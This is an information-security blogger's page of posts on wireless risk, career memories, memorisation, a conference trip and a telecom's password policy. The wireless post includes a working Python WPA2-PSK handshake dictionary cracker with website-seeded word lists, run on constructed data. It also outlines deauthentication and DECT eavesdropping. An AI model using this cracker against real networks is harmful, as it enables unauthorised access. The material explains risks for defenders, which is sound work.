FishermansEnemy - The personal ramblings of an information security geek

Watch out for wireless technologies

This is a cross post of a blog article I wrote at
Common risk assessment blind spots

Wireless technologies have become commonplace in the last few decades; everything with a battery seems to have an IP stack and an antenna. Ubiquitous connectivity gives us access to the whole of human knowledge with a simple Google search, and an organisation that didn’t provide the infrastructure to access the internet might be thought of as backwards and out of touch with modern business methods. A lot has been written on the subject of WiFi security and many lessons have been learned since the good old days of WEP “encryption”, but there are still things organisations need to think about before deploying this kind of technology.

WPA2 is secure, right?

Yes, WPA2 is pretty secure, and if someone is looking to have a play with your access points then seeing it in their favourite scanning tool will probably have them looking elsewhere. When I am tasked with assessing the security of a wireless installation, though, use of WPA2 is not in itself enough for me to give the thumbs up. When WPA2 is used with a pre-shared key (WPA2-PSK) there is the possibility that whoever set it up did not choose a complex enough key. It is a simple matter to observe the wireless network traffic until you see a device authenticating to the access point (or to hurry things along by sending a deauthentication frame so that a client reconnects); once you have captured the 4-way handshake you can feed it into a tool like aircrack-ng along with a word list. The handshake carries a MIC derived from the pre-shared key, so every candidate in the word list can be tested offline without ever talking to the access point again. If the network admin picked a dictionary word, or a dictionary word with some “clever” character substitutions, then you can usually recover the pre-shared key in a day or so. An attacker can boost their chances of obtaining the key by seeding the word list with words that are closely linked to the organisation they are attacking: they simply download the entire company website, pull out every unique word they find and add them to the usual word list (CeWL is the tool usually used for this).
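As an added illustration (not code from the original post, nor from aircrack-ng), the following Python shows what the offline dictionary check against a captured WPA2-PSK handshake actually computes, together with the website-seeded word list and character-substitution mangling described above. The SSID, MAC addresses, nonces, EAPOL frame, web page and passphrase are all constructed for the demo; the derivation steps (PBKDF2 to PMK, PRF-512 to PTK, HMAC-SHA1 MIC over EAPOL message 2) are the ones IEEE 802.11i specifies.

```python
"""
Added example: the offline check tools like aircrack-ng perform on a
captured WPA2-PSK 4-way handshake, plus "company website" word-list
seeding.  Every handshake value, MAC address and web page below is
constructed for the demo.
"""
import hashlib
import hmac
import re

SSID = b"AcmeCorp-WiFi"                      # constructed SSID
LEET = {"a": "4", "e": "3", "i": "1", "o": "0", "s": "5"}


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    # PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    # The SSID is the salt, which is why precomputed tables exist for common SSIDs.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid, 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    # 802.11i PRF-512: concatenated HMAC-SHA1 blocks over label||0x00||data||counter.
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    # Both sides order the MACs and nonces so that they derive the same PTK.
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    # Key descriptor version 2 (WPA2/AES): MIC = first 16 bytes of HMAC-SHA1(KCK, frame with MIC zeroed).
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes) -> bytes:
    # Constructed EAPOL-Key message 2/4 with the MIC field zeroed (what the MIC is computed over).
    body = (b"\x02"              # descriptor type: RSN
            + b"\x01\x0a"        # key info: MIC set, pairwise, descriptor version 2
            + b"\x00\x10"        # key length
            + b"\x00" * 8        # replay counter
            + snonce             # key nonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # IV, RSC, key ID
            + b"\x00" * 16       # key MIC (zeroed)
            + b"\x00\x00")       # key data length
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def make_demo_handshake(passphrase: str):
    # Constructed "capture": the fields an attacker reads out of the handshake frames.
    ap_mac, sta_mac = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    eapol = build_eapol_msg2(snonce)
    kck = derive_ptk(pmk_from_passphrase(passphrase, SSID), ap_mac, sta_mac, anonce, snonce)[:16]
    return ap_mac, sta_mac, anonce, snonce, eapol, eapol_mic(kck, eapol)


def site_words(html: str):
    # Harvest unique words from the organisation's web pages (what CeWL automates).
    return sorted({w.lower() for w in re.findall(r"[A-Za-z]{4,}", html)})


def mangle(word: str):
    # The "clever" substitutions: capitalisation, leet-speak and common suffixes.
    bases = {word, word.capitalize()}
    bases |= {"".join(LEET.get(c, c) for c in b) for b in list(bases)}
    for base in sorted(bases):
        yield base
        for suffix in ("1", "123", "2013", "!"):
            yield base + suffix


def build_wordlist(html: str, common=("password", "letmein", "welcome1", "qwerty123")):
    words = list(common)
    for word in site_words(html):
        words.extend(mangle(word))
    return words


def crack(handshake, wordlist):
    ap_mac, sta_mac, anonce, snonce, eapol, mic = handshake
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:   # WPA2 passphrases are 8..63 characters
            continue
        kck = derive_ptk(pmk_from_passphrase(candidate, SSID), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol), mic):
            return candidate
    return None


# Constructed company web page; the admin used a leet-speak company name plus a year.
SITE_HTML = "<h1>Welcome to AcmeCorp</h1><p>Serving Dudley and Halesowen since 1994.</p>"

if __name__ == "__main__":
    handshake = make_demo_handshake("Acm3c0rp2013")
    print("recovered PSK:", crack(handshake, build_wordlist(SITE_HTML)))
```

Each candidate costs 4096 PBKDF2 iterations, which is what keeps the attack to thousands of guesses per second per CPU core (far more on a GPU) rather than millions; a 63-character random key simply never appears in any word list, which is the whole point of the next paragraph.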

As you can see from the above, it is imperative that the key you select be as random and as long as possible (WPA2 allows a passphrase of up to 63 characters) to help mitigate this kind of attack. The problem this gives you is the same as with any other password complexity requirement: the more secure the key is, the more likely it is to be written down where someone who should not know it can find it. You also have the added headache of distributing the key to the legitimate users of the network.

What a lot of network administrators fail to think about is what happens when the key is compromised, for example if a wireless device is lost, stolen or infected with malware. Once your key is out of your control you need to make sure that it is changed and a new key distributed to all of your users. In my experience this rarely happens, and it is usually a reason for abandoning the pre-shared key model and looking at enterprise-level controls using 802.1X, where each user or device has its own credential that can be revoked on its own.

It’s just a guest network

A lot of organisations have secure 802.1X wireless infrastructures for their staff to use for corporate LAN access, but decide that it would be nice for visitors to be able to get internet access without having to provision certificates for them or give them access to the corporate LAN. This is very convenient for guests, but as we shall see there are a number of issues that need to be addressed before you roll something like this out.

Firstly, wireless does not respect the walls of your building the way that your wired infrastructure does. A 2.4GHz WiFi network can usually be observed from the car park of an office building, as well as from other floors of the building that may not be under your organisation’s control. When you implement your infrastructure, take care with antenna type and placement to minimise the amount you radiate to the outside world: use directional antennas and turn down the transmission power on your access points. If a network is radiating too much power in the wrong direction then it is trivial to get access to it using a laptop’s built-in network card, and someone who wanted to take advantage of your generous offer of free WiFi could do so from quite a considerable distance with something like an Alfa USB wireless card and a cheap directional antenna, which brings me onto my second point.

You are liable for what happens on your network

You may trust the people you work for and the guests you invite into your buildings, but if someone can access your network from outside of your organisation’s sphere of control then they have free internet access and you have no way to control them. If you implement guest WiFi access then make sure that you apply the same levels of content filtering and logging that you do on your wired network, and keep the guest network segregated from the corporate LAN. If someone is intent on doing something illegal using your network then any investigation is going to end up on your doorstep. I don’t know a single company that would want to be in that position. Ultimately this needs to be taken on board as part of the standard risk assessment process, and the benefits of offering this service may not be worth the investment required to mitigate the threat of unauthorised or illegal use of the infrastructure.

It’s not just WiFi that radiates

The points that I have addressed above are the biggest blind spots that I have come across in my experience with corporate WiFi, but one that still catches a lot of organisations out is all of the other things they have that utilise radio. This kind of problem is one that the intelligence services have been aware of for quite some time, which is why you will never see a wireless keyboard and mouse in GCHQ. They have invested time and money into both protecting themselves and being able to intercept these kinds of signals from others. This kind of signals intelligence is known to the outside world under its codename ‘TEMPEST’ and has been actively researched in public since the mid-1980s.

I would have a hard time justifying to a client that they should adopt TEMPEST levels of emission control, as most of them simply are not under threat from actors who will use this level of sophistication; however, I have seen wireless technology deployed within critical business functions where it simply was not needed.

An example of this would be in a service centre environment. The agents in the service centre were delivering first-contact support to the entire organisation, including authentication and access control services. They are desk-bound, and in fact cannot do their job if they are away from their computer. These agents had recently had their phone system upgraded and had all been given very nice looking wireless headsets with which to take their calls. A brief look at these headsets revealed that the protocol they were using to communicate with their base stations was DECT, a standard that anyone with a cordless phone or baby monitor would be familiar with. DECT can employ encryption of the data stream (the proprietary DECT Standard Cipher), however since 2010 this has been rendered ineffective as the team at managed to reverse engineer the closed-source algorithm so that the encryption key could be recovered.

I mention the encryption here to ensure you understand that even with encryption in place the content of these conversations cannot be considered private; however, in the case of the contact centre I was investigating, the data sheets for the device proudly stated that encryption was not actually implemented. The data sheets were also very proud of the range of the devices, boasting 50m within a building and up to 200m outdoors using only the low-power headset and base station. This particular contact centre was well within 200m of a public space with direct line of sight to the call handling agents through the building’s windows. A small investment in a Com-On-Air PCMCIA card and possibly a cheap directional antenna and someone could very easily listen in on or record every phone call taking place, a treasure trove of information for someone who wishes to do your organisation harm.

In this case I strongly advised that they cease using this technology and outlined the risks above, but I can’t really blame them for implementing it in the first place. It’s my job to think evil things about every piece of technology I come across, but the vast majority of people who are involved in procurement and risk assessment don’t make the connection between ‘wireless’ and ‘security’ unless they see the WiFi logo somewhere on the box.

It’s all about risk

Technical security has been talked about a lot with regards to wireless networking and wireless technologies, but as I have demonstrated here there are still a few blind spots that organisations need to address when investigating any technology that comes with a radio in it. Utilise your organisation’s security staff as part of the risk assessment process and ensure that they are given the resources to keep their knowledge up to date. If you are implementing anything using wireless technologies and do not have the skills in house to assess the security implications then invest in some external consultancy. This could save you a lot of time and money compared to fixing an insecure implementation. This is a problem that is not going to get any easier to deal with as radio connectivity becomes more a part of every device we use.


I’ll preface this post with a warning that it is 99% technical content-free. If you want to follow me on a trip down memory lane to the early ’90s then grab your Walkman, put on your shell suit and let’s do this!

Let’s have a drink

A friend who I used to work with at RWE decided to organise a night out for those of us who have recently left. It’s been 6 months since I left RWE after working there for 13 years and a lot of us who had been there for similar lengths of time have left over the last year or so. I hadn’t seen these guys since I left so I was looking forward to catching up with them and seeing how they’re doing, and commiserating with those that were still there and facing the axe.

A pint and three-quarters in and we were swapping war stories about life outside the old concrete monolith that we’d worked in for so long and talk soon turned to how we’d all ended up there.

I hadn’t realised when I got the invite, but one of the guys who came along I had known from my very first IT job back in 1994……

The college years

I was 17 and I had just left school the previous year. I was studying a BTEC in IT fundamentals and applications at Halesowen college, life was good and I still had hair. I hated school, I mean I really hated it and I was so glad to finally be out from that toxic atmosphere. I was finally studying what I was interested in with a bunch of nerds who were mostly on the same wavelength. The course was heavy on programming, maths and electronics and it was really fun to get my teeth into something so interesting. Part of the course required that we do 2 weeks of work experience with a real business, to help us prepare for the realities of work I guess.

At this point I had worked nights at a petrol station just to get some money to go out with. The fates had other ideas about that and the petrol station was soon shut down and I was out of work. I figured if I could find the right place to do my work experience I might be able to turn it into a 2 week interview and get another job out of it. A job that is actually in the field I was studying.

ICON computers

Just pretend it's full of computers and not beds.

The Dudley area wasn’t exactly silicon valley so the opportunities to work in IT for a 17-year-old at college weren’t exactly vast and many. My only realistic option was the large computer store that had recently opened over on the Merry Hill waterfront. I make a phone call and speak to the store manager Irfan and arrange to go in to speak to him. A short interview later and I’ve got my work experience placement.

ICON was my first proper IT job and I quickly fell into the technical support role. My mentor for those early years was Andy Green, the technical manager, and I credit him for giving me the time, resources and knowledge that I needed to start on the path that I’m on today.

I clearly remember the first ever job I had to do at ICON. A customer had bought a new hard drive from us, a whopping 150MB monster, and he wanted us to fit it for him in his PC. I had *no* idea where to start. We didn’t have the internet back then so it was a case of reading the badly translated Japanese manual, grabbing a screwdriver and seeing what was what. After plugging in the IDE cable and power I switched the machine on and…. DISK NOT FOUND. Crap, not only wasn’t it seeing the new disk but it couldn’t see the old one either and the machine wouldn’t even boot. Andy sees what I’m doing and it’s obvious that he’s having fun watching me think I’ve destroyed the customer’s computer. He gives me a minute and then comes over and points to a pair of jumpers on the back of the drive labelled “Master” and “Slave”. The penny drops, I move the jumper on the new drive from “Master” to “Slave” and the machine boots first time. This was probably one of the best lessons I could have had: he let me have a go and only gave me just enough information so that I could figure it out for myself. I learned so much from the time I spent working for Andy and I’m sure that I wouldn’t be where I am today without the guidance he gave me in those early years.


Check out this 9600 baud bad boy

Soon after I started at ICON a friend of mine from college mentioned that he was also looking for a job. At the time the support department was just Andy working full-time and me working on the weekend. We were starting to get busier in the shop as the home computer market was starting to take off in a big way. Windows 95 was just around the corner and there had been a big marketing push by Microsoft. My friend came on board to join me at the weekend and we hired 2 full-time guys to work some of the week and the busy Saturdays. Mike was one of the full-time guys we brought on and it was him who started me on this 20 year trip down memory lane last night. I could fill a hundred blog posts about the kind of stuff we got up to in those 18 months we were there, but suffice to say we got to play with tons of cool stuff, such as the beast of an acoustic coupler pictured above which we used to reach BBSs all over the place. We also set up a 10base2 Novell network in the store, and used it to play Doom. We got to see one of the first CD writers to come on the market and I ended up getting an Apple Newton!

Massive in-joke. Check the ceiling next time you're buying a bed

Sadly this wasn’t to last. Many smaller shops sprang up and a combination of our location and the size of the store soon made it impossible to compete. We all kept in touch after we went our separate ways and some of us even ended up working together again. I made some great friends in ’94 who I’m still in contact with today, we socialised together, chased girls in the local pubs and at least two of us met our partners thanks to the friendships we made.

So thank you Mike for reminding me about the journey I’ve been on. Thank you Irfan and Greg for giving me a chance. Thank you Andy for having the patience to train me, and making sure I had the tools I needed to continue to learn that I still use to this day. Thank you Neil for putting up with my constant attempts at comedy for the past 25 years. Thank you to all the people who have helped me as I moved from place to place and gave me opportunities to grow and develop. I hope that I’ve not let you down.

The Method of Loci

In my earlier post I mentioned that I was studying for my PA-DSS exam and that I was using a memory palace technique to commit the standard to memory prior to the exam. I’ll find out in a couple of weeks whether it actually helped as the exam didn’t actually ask a lot of questions that required rote memorisation of the standard.

UPDATE: I’ve just had the confirmation and I am now a PA-QSA. God have mercy etc.

I was asked by a friend about the kind of technique I actually used to build this, and I figured that it might be useful for other people as well so I felt a blog post was in order.

Wikipedia has a good write-up of the Method of Loci if you want to read all about the history and evolution of this type of memory mnemonic so I won’t waste your time copy/pasting it here. I am going to detail how I came across this technique and where I have used it to help memorise large quantities of usually dull and boring information.

You may have noticed I used “dull and boring” above and this is where a technique like the memory palace really comes into its own. I’m sure that if you are anything like me then remembering things that you find interesting isn’t usually a task at all, however if you have to keep 200+ security controls in mind when assessing a client then committing that kind of information to memory would seem like an impossible task.

In essence what the memory palace gives you is the ability to use the areas of your brain that handle things like visual, auditory and olfactory stimulation and tie them together in order to apply them to abstract concepts like security controls, to enhance the information available for your brain to index on. The method that I like to use I first came across reading Derren Brown’s Tricks of the Mind. This method uses a building that you are familiar with and takes you on a journey through it room by room. In each room you place items and people who you can connect with the item being memorised. This may be a number, playing card, security control or pretty much anything you like as long as the visual image is distinctive.

I find that the way that my mind works means that if I have a lot to remember I cannot fit it all in one building and have it stay “real” enough to my brain to be able to recall all the items at a later date. Because of this I have adapted the memory palace technique to use what has been called by others the journey method. This still has you placing people and items in locations but has the advantage of not being tied to a single building, but rather a series of connected locations that exist, at least for the most part, in reality. This is all very abstract so I feel an example is in order. If you are a masochist and you happen to be trying to memorise the PA-DSS V2.0 standard then please don’t use my example as a start, it won’t stick. Make sure you construct your own journey and it will pay off in the future.

PA-DSS V2.0 1.1.1

I’m standing on the corner of Powell and Market street in downtown San Francisco. I look up at the road sign above the intersection and notice that the roads are named “1st Street” and “Track Avenue”. In this area are a number of street vendors selling souvenirs and I walk over to the nearest one. He doesn’t seem particularly reputable. He is taking payment from a customer and I notice that he has taken the customer’s card and is swiping it though a mag stripe reader. “Do not store the full contents of any track from a card after authorisation”


PA-DSS V2.0 1.1.2

He turns the card over in his hand and I see that he is reading the CVV number from the signature strip and is writing that down in a notebook. “Do not store card CVV values after authorisation”

PA-DSS V2.0 1.1.3

He tells the customer that the mag stripe didn’t work and he needs to know their PIN. He also writes this down in the notebook. “Do not store PIN or PIN Block after authorisation”

PA-DSS V2.0 1.1.4

While this is going on 4 police officers approach the vendor from behind and walk over to a number of buckets sitting behind the vendor that I can see are full of the same type of notebook the vendor is using. They talk for a moment and then set fire to the notebooks. “Securely delete any mag stripe, CVV or PAN data stored by previous versions of the software”

PA-DSS V2.0 1.1.5

The vendor is upset at the arson going on behind him. The police officers go to arrest him for his flagrant disregard for the law, however before they can a representative from the vendors payment handler approaches them and informs the police officers that he actually asked him to store this data to help solve a problem the vendor was having processing payments, and that he was going to make sure it was all disposed of once the problem had been solved. “Securely delete any sensitive authentication data used for debugging or troubleshooting”

Here you have my loci for PA-DSS V2.0 control 1. It works great for me as I can easily close my eyes and place myself in that exact location. The further I go into my journey the more personal to me it becomes so please don’t ask me about specific controls as even if I explained my loci it would make no sense to you at all. San Francisco was where I was doing the training for PA-QSA so it makes an obvious place to base my journey. I can remember the sounds and the smells (oh God, some of the smells) without any effort at all. I shall now forever associate the smell of Cannabis and despair with control 3. My hotel was in a very interesting neighborhood.

I hope this example of mine will help anyone else who is interested in trying something like this. If you have any questions then please leave a comment or hit me up on Twitter or G+ and I’ll do my best to answer them.

My experience of San Francisco and the BSides SF conference

San Francisco City Street

I’m currently sat waiting to finish the PA-QSA course and take my exam. I should probably be studying a little more, but I’ve memorised the standard with a memory palace technique that I used for PCI-DSS so I reckon I should be fine.

San Francisco is the first American city I’ve been in so the only comparisons I have are with large UK and European cities, but even so it seems to be very unique. It has the hustle and bustle that you’d expect from somewhere like London but everyone here seems to be a little more relaxed about life. The area around the Moscone Center where RSA 2013 is being held is your typical conference district that you could find anywhere, but a few blocks walk from there you can find some of the worst poverty and homelessness that I have ever encountered. I’m not sure if it was because the RSA circus was in town but getting a hotel within a block or two of Moscone will cost you an arm and a leg. I managed to get a relatively cheap hotel only about 4 blocks from Union Square and Moscone, and even though the hotel itself is quite nice the streets around it are littered with people sleeping rough along with open drug use and people who are clearly in need of help with regards to their mental health. Those of you who know me might think I’m making a joke about this, I’m not. It’s something that as an outsider really makes you consider how something like this comes about and where the people of the city are putting their priorities when something like this is just accepted as being the way things are.

DNA Lounge ATM machine

Anyway, now I’ve bummed you all out I’ll move to the more exciting parts of my visit. I’m actually in town to do my PA-QSA certification, however as the flights at a weekend are half the price of the same flight in the week I ended up with some time on my hands. I decided to sign up for BSides SF and I’m really glad I did. I’m not going to write a point by point review of the talks as I believe that 99% of them were recorded, so go online and watch them. One that I really did enjoy was on physical pen testing by Valerie Thomas. She gave a very interesting presentation on the vast amount of recon you can do with simple to use open source data sources, and the kind of stupid things you can do to bypass a variety of access control mechanisms.

After lunch on day 2 I decided to take a break from the main tracks and have a play in the locksport room. They had just run a competition where about 30 attendees got to try and escape from handcuffs live on stage with a bit of training given by the experts. Pretty much all the people who got up managed to get the cuffs off in under 10 seconds, so I thought to myself, I’m having some of that!

Ian in handcuffs

The locksport guys provided a range of picks and practice locks as well as a few examples of typical law enforcement style handcuffs. After a couple of minutes instruction I got myself cuffed up and managed to shim the cuffs and get them off in about 5 seconds. It was way easier than it should be, although as it was pointed out to me there are ways of cuffing the hands together to make it harder, but not impossible, to do this kind of escape.

A collection of locks and picks at BSides SF.

After I’d perfected the shim technique they took us through how to pick the cuffs using a pick or bobby pin through the keyway. This also included picking cuffs that had been “double locked” so that the shimming technique would not work. Now, that is a lot harder than shimming but with an hour or so of practice I was getting pretty good at it. So, if anyone is stuck for a birthday present for me then a nice set of Law Enforcement grade cuffs would be grand :)

Now, if you’ve watched the Twitters then I’m sure you would have heard about the controversy surrounding @violetblue’s talk, and the fact that it was pulled at short notice. I’ll let Violet tell the story in her own words, as all I heard was a bit of conversation while I was being cuffed by Twitter’s head of security. If what Violet says is true then I have personally lost all respect for the ADA initiative’s goals. Feel free to try to help people take part in the community, but do not try to censor hackers, we really don’t like it.

Alcatraz Island docks

After all that excitement I decided to take a tourist day before I was locked in a room with a bunch of auditors for 2 days. I had a walk around the various piers near Fisherman’s Wharf and took a trip out to Alcatraz Island. I’m glad I did as the ranger guided tour along with the audio tour of the cell blocks was fascinating. If you want a breathtaking view of downtown San Francisco then there are very few to beat the one from the prison block on the top of Alcatraz.

Hunting Zebras (or how a toothbrush made me feel dumb)

Anyone who follows me on Twitter will probably remember that I’ve had some issues with my Samsung Galaxy S2 ever since I upgraded from 2.2 Froyo to 4.0.3 Ice Cream Sandwich. There are many posts in forums all about the battery and stability issues that have plagued this update and I have probably read all of them.

I also had some fun times with enabling encryption on the device due to it presenting a blank screen while it was performing the encryption rather than something that would let you know it was actually doing something.

With all the above issues I was hoping that the next update to arrive on my phone would solve all of my problems, so when Samsung made 4.0.4 available I installed it as soon as I could. Oh, and thanks Samsung for using OTA for the 4.0.4 update and not that piece of crapware you call Kies.

I bet you’re wondering where the African wildlife and dental hygiene products are? Don’t worry, they’re coming.

I ran 4.0.4 for a few days and was very happy that my battery was lasting longer, without the infamous “Android OS” usage that was killing it last time. The phone was more stable, in the sense that it actually kept running instead of overheating and crashing twice a day. I’m also sure that it made me more attractive to the opposite sex, everything is coming up Ian…

…Until I got a phone call. I don’t know if I’m typical of a smartphone user in that I use my phone for 90% data such as email, IM, social networking, 8% SMS and about 2% voice as I make and receive phone calls quite rarely. Recently I have used voice a lot more as I am in the process of changing jobs to a new employer. This call was from my new boss. He sounded like he was verrrry verrry far away. The volume was so quiet that I assumed he was either using a speaker phone or hiding under a bed because Liam Neeson was hunting him. I punched the volume up button but he was still almost inaudible. I managed to make it though the phone call, and I just assumed that his phone was at fault…

…Until I got another phone call from my wife; she also sounded very far away. I know she never uses speaker phones and has done nothing to draw the eye of Liam Neeson, so at that point I figured there was something wrong with my handset, and the only thing to change recently was the OS.

I made a few calls to my network provider’s automated system and they were also quiet, so it is not just incoming calls that are a problem. Google is a wealth of information on this; apparently there were loads of problems like this on 2.2 and the solution was to enter a handset configuration mode and manually set the in-call volume. I key in the special code and get to the configuration but the audio menu is blocked out so I can’t make any changes. At this point I’m getting annoyed, why can’t they test these updates before they send them out?

I start downloading apps that give access to “hidden” volume sliders, but all of them are set to maximum, I take a look at the internal logs and can’t spot anything that might be causing the problem. The only thing I haven’t done is a factory re-set. I hate doing these as it always takes me weeks to get my phone running just as I like it but at this point I need a phone that actually works as a phone. I bite the bullet and factory re-set the phone, selecting the option to back up all of my settings. 10 minutes later my phone is back to its ugly-ass default config, but at least all my settings have been preserved. I make a phone call to my network … and it’s really quiet again. Huh.

If you’re still reading, I promise the ambulatory barcode is coming up.

I figure that maybe, just maybe the backup process kept a setting that is causing my problem so I factory re-set the phone again without taking a backup of any settings. One test phone call later and it is still quiet. F*cksocks.

At this point I am convinced that I’ve either got a hardware issue with my earpiece speaker or the software update has swapped all of my other problems for this show stopper. I’m making a lot of calls because of my new job, I’ve got to go to Liverpool this week to do a talk and I’m going to need to be contactable, damn it I’m going to have to dig out my old Desire and send this one back to Samsung for repair. This is just what I need!

I Google a little more to see if anyone else has seen this problem with 4.0.4 in particular and one of the long forum threads with all the usual “Do the handset configuration mode fix…” “Re-set the phone, you’ve got bad settings from 4.0.3” “Download these apps… root your phone….” had this little gem buried in the middle:

“I had this problem as well. It turned out my speaker grill was dirty. I cleaned it and it was fine after that”

Well that’s just silly. This came on suddenly after my upgrade, it must be an issue with the software or a hardware failure. Still, doesn’t hurt to try right? I grab my toothbrush and give the grill a little clean. I make a test call to my network and once agai…. hang on a second, that’s loud again! I make another test call and it’s back to normal!

I had forgotten the lesson that I thought I had learned years ago: before you go hunting for that rare zebra that is causing your problem, make sure your issue isn’t with that simple looking horse that has been standing there the whole time.

Hopefully the lesson has sunk in this time.

Bad password policies

Ever since I got my Yubikey I’ve been a big fan of making sure my many web application accounts are as secure as possible. Thanks to services like LastPass you can now keep unique, complex passwords on every account you own with very little extra effort.

So, in this spirit I decided to change my “My 3” account password at I fire up the random password generator and create a nice large random string. I take the string and feed it into their change password dialogue only to be told that only passwords less than 12 characters will be allowed. This backwards thinking is common in a lot of web applications, usually because of very bad design decisions made by the developer when it came to managing user authentication. A lot of the time it is an indicator that passwords are stored without hashing.

On small web apps you should probably note this and make sure that you don’t use them if you value your security. However, this app was one that I had to use, and the company behind this password policy and its worrying implications was holding my mobile phone records, so I was not going to let this go. I sent the following tweet to @threeuksupport yesterday:

#fail @ThreeUK @ThreeUKSupport “Your new password can not be greater than 12 characters in length”

Very soon they got back to me and a number of my followers that also happened to be customers saying that they would pass this to the security team and get a response back. This is actually pretty unusual for companies like this, as they mostly like brushing things like this under the carpet.

This morning the few of us that raised this got an email response from Three. Included below is the email they sent and my in-line reply.

On 21 June 2012 11:37, socialmediacare <> wrote:

Hi there,
Following the discussions on Twitter regarding My3 passwords, I’ve spoken with our security team and they’ve advised of the following:
– Passwords obviously need to be stored in a database.
No, passwords should *never* be stored. They should be salted with a unique value per user and hashed with a computationally expensive algorithm.
To prevent threats from things like SQL Injection, it is necessary to limit the password length so that Hackers cannot enter lengthy SQL statements (as passwords) to try and retrieve data from the database, corrupt it, or use Cross Site Scripting techniques by entering Javascript etc in input fields.
SQL Injection and XSS are defeated by proper input and output validation, not restricting the length of users passwords. This is a basic premise of securing web applications.
– Most people find passwords hard to remember. This is compounded when the password policy mandates that it must contain a combination of letters and numbers.
Does this mean that you *don’t* mandate alpha-numeric passwords?
To help ensure passwords are more memorable, and to reduce calls into the contact centre relating to forgotten passwords and locked accounts, the policy has been set such that a minimum of 7 & maximum of 12 characters is supported.
How does stopping a user from using a 13 character password prevent the user from forgetting it? At least you can admit that your goal with this policy is to reduce customer support calls. This is easily mitigated by having a robust automated password re-set mechanism as used on thousands of other web applications. Small sites like ebay and paypal.
Passwords longer than 12 characters are no more ‘secure’ but are significantly more likely to not be remembered or miss typed.
Forgotten and mis-typed yes, but “less secure”? You could not be more wrong. Please tell me how you arrived at the conclusion that password length does not impact on the security of the user’s account.
Password security is largely a factor of the user’s choice of password. Something that is memorable to the user will always have the potential to be ‘guessed’ by another person through possible social engineering techniques etc.
If a password is longer than 12 characters, a user is more likely to have to write it down somewhere.
So you are arguing that a long password would be written down, therefore only exposed to a local physical security breach, so we’ll make sure they *can’t* have a long password and then they’ll only be exposed to every phishing site, keylogger and brute forcer on the planet? How does that make any sense? Your position acknowledges that short memorable passwords are insecure (something you denied in a previous paragraph) yet you decide that the best position for you is to mandate them?
– It could be argued that 12 characters is a little restrictive. However, the reference to the recent Linked-in mismanagement of passwords, some might say, is an irrelevance in relation to limiting the maximum password length to 12 characters. On this note, none of the passwords are stored in clear text form.
You need to look at the Linkedin breach and answer this again. At least Linkedin hashed their passwords, but without a salt and a CPU expensive algorithm the passwords were recovered for the vast majority within a few hours. First to fall were the dictionary words, so tell me again why you are limiting users to small passwords that are easy to remember?
While we obviously have a duty of care over customer data, we also have to find the balance between protecting this data and usability.
You do have a duty of care over customer data, I’m glad that you realise that. With the recent exposure of phone infrastructure hacking from NI and other journalists I would have hoped that you realised that you hold the very private and personal data of a vast number of individuals who expect you to at least abide by industry best practice when it comes to securing access to it. If I were a high profile individual then, given this response from a national mobile infrastructure company, I would be very concerned about people who wish me harm gaining access to my call records.
Thanks for raising your concerns with us.
I look forward to seeing your acknowledgement of these issues and remediating them as soon as possible.
P.S. I’ll be asking about your username policy next.

So there we have it. I’ll wait patiently for a reply from Three and let you know the outcome.


Here is the reply from Three UK

Hi Ian
I’ve raised your further email with our security team. They’ve advised that they’re unable to enter into further discussion with you regarding our technical details on how we manage and store user credentials.
Doing so would only be a security risk in itself.
Our website clearly states “Your password must be at least 7 characters long and must contain at least one number and one letter” and we do enforce these constraints.
Please take this as our final response on the matter. I hope you understand the reasons why we’re unable to go in to any further security specifics with yourself.

So there we have it: I shouldn’t worry my pretty little head about it, and if they told us what they actually do to secure our data the entire planet would explode. Draw your own conclusions.

I guess I shouldn’t worry that they’ve got a new interface to My 3 in beta, accessible to all users, going on right now. I bet that thing is tight as a drum.

Decoding the SANS BSides London 2012 t-shirt

Now that I’ve had a little while to recover from my trip to Atlantis … sorry, London last week I thought I’d turn my hand to something that’s been bothering me ever since I saw it.

Let me introduce the SANS variant of the official BSides London t-shirt.

[Image: the back of the SANS BSides London 2012 t-shirt, which carries a block of code]

As you can see there is a nice block of code on the back. I assumed that this was some kind of well known infosec inside joke that I wasn’t familiar with. I put it on hoping that it didn’t say “Kick me” in unicode and proceeded to fill myself with Club Mate and awesome talks.

A few days pass and I catch sight of it again in the washing, so before tossing it in the washer I took a picture so I could take a closer look later.

What do we have here?

It looks like we have 2 different items here. The first is a block of what looks like hex-encoded data, and the last line looks like some kind of script.

The first block

The first thing I noticed about the code is that it ends with either 3d3d or 3d3d3d, depending on whether you allow it to wrap to the bottom line. So, what encoding scheme do we know that pads the end of a block with 2 characters? That’s right, base64. If you take 3d3d in hex and convert it to ASCII you get ==, the typical padding for base64.

Next, I took the string from the shirt and converted it from hex to ASCII


which converts to


I then took this base64 encoded string and decoded it using . This gave me an ASCII string.


Ahh, now we’re getting somewhere. We have a URL that has been reversed. It’s short, and fairly obviously a URL, so I keyed it in by hand to my browser.

This leads us to another block of base64 encoded text.


Let’s put this through our decoder and see what we get. In this case it is a binary file of some sort. Because this is just a binary blob, how do we know what to open it with? In this case I used the ‘file’ command on Linux, which looks at a file’s ‘magic numbers’ (the typical header bytes of each format) and tells you what type of file it is. In this case it is

DecodedBase64 (1).bin: gzip compressed data, was "jlchal.txt", from Unix, last modified: Tue Apr 10 16:14:40 2012

I renamed the file and put it through gunzip and ended up with an ASCII text file.


In case that doesn’t render in your browser, here’s what it looks like.

God only knows

Who the hell is this guy

